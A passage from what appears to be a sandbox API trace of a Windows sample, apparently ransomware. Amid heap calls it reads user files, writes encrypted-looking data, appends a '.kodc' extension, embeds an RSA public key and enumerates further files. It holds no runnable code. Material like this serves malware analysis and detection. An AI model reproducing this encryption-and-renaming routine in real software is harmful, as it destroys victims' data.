Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e48 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb59c8 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.761] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0xe25f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0xe25f, lpOverlapped=0x0) returned 1 [0100.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.761] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe264, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.761] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.762] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.762] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.762] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.762] CloseHandle (hObject=0x5cc) returned 1 [0100.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0100.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0100.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0100.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\553Q_Gxbe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\553q_gxbe.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\553Q_Gxbe.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\553q_gxbe.docx.kodc")) returned 1 [0100.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.764] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.766] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47028800, ftCreationTime.dwHighDateTime=0x1d5c4c4, ftLastAccessTime.dwLowDateTime=0x5b47ba90, ftLastAccessTime.dwHighDateTime=0x1d5b7ec, ftLastWriteTime.dwLowDateTime=0x5b47ba90, ftLastWriteTime.dwHighDateTime=0x1d5b7ec, nFileSizeHigh=0x0, nFileSizeLow=0x340b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77 l uyd5foD_16HEXj.gif", cAlternateFileName="77LUYD~1.GIF")) returned 1 [0100.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0100.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.766] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\77 l uyd5foD_16HEXj.gif") returned=".gif" [0100.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\77 l uyd5foD_16HEXj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\77 l uyd5fod_16hexj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.766] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=13323) returned 1 [0100.766] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.769] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x33e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.769] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.770] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.770] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x340b, lpOverlapped=0x0) returned 1 [0100.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.770] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.771] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.771] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.771] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.771] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.771] GetLastError () returned 0x0 [0100.771] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.771] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.772] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.772] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.772] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3410) returned 0x9ba8d90 [0100.772] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb59c8 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5a10 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.772] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e48 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e30 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.773] GetCurrentThreadId () returned 0x42c [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba74f8 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.774] GetCurrentThreadId () returned 0x42c [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.774] RtlAllocateHeap (HeapHandle=0x630000, 